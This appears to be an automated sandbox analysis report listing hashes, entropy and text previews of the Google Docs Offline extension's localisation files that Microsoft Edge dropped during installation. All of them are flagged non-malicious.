SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
